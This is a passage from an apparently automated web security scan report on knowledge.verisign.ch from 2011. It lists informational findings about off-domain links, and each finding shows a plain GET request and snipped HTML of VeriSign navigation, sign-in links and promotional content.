</a> <a style="margin: 5px 10px 0pt 0pt; display: block; font-weight: bold; float: left; background-image: url(&quot;/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif&quot;); width: 75px; color: rgb(255, 255, 255); line-height: 24px; height: 24px; text-align: center; text-decoration: none;" href="https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&amp;originator=VeriSign:CELP">SEARCH</a>
...[SNIP]...
<li><a href="https://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html" target="_self">Report Code Signing Misuse</a>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.8. https://knowledge.verisign.ch/support/digital-id-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/digital-id-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
</h4>
<a href="https://digitalid.verisign.com/services/client/renew.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none">RENEW</a> <a href="https://digitalid.verisign.com/services/client/revoke.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none">REVOKE</a> <a href="https://digitalid.verisign.com/services/client/replace.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none">REPLACE</a> <a href="https://digitalid.verisign.com/services/client/index.html" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(255,255,255); line-height: 24px; height: 24px; text-align: center; text-decoration: none">SEARCH</a> <a href="https://digitalid.verisign.com/client/retrieve_id.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none">RETRIEVE</a>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.9. https://knowledge.verisign.ch/support/mpki-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/mpki-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/mpki-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
<br/>
                           
                           
                           <a href="https://onsite-admin.verisign.com/OnSiteHome.htm">
                               <img src="apps/infocenter/resources/images/signin-button.gif" alt="Sign In"/>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/ssl-certificates-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
</a> <a href="https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&amp;originator=VeriSign:CELP" style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none">SEARCH</a>
...[SNIP]...
<br clear="left" />
<a href="https://ssl-certificate-center.verisign.com/process/retail/console_login" style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none">SIGN IN</a>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.12. https://knowledge.verisign.ch/support/trust-seal-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/trust-seal-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/trust-seal-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
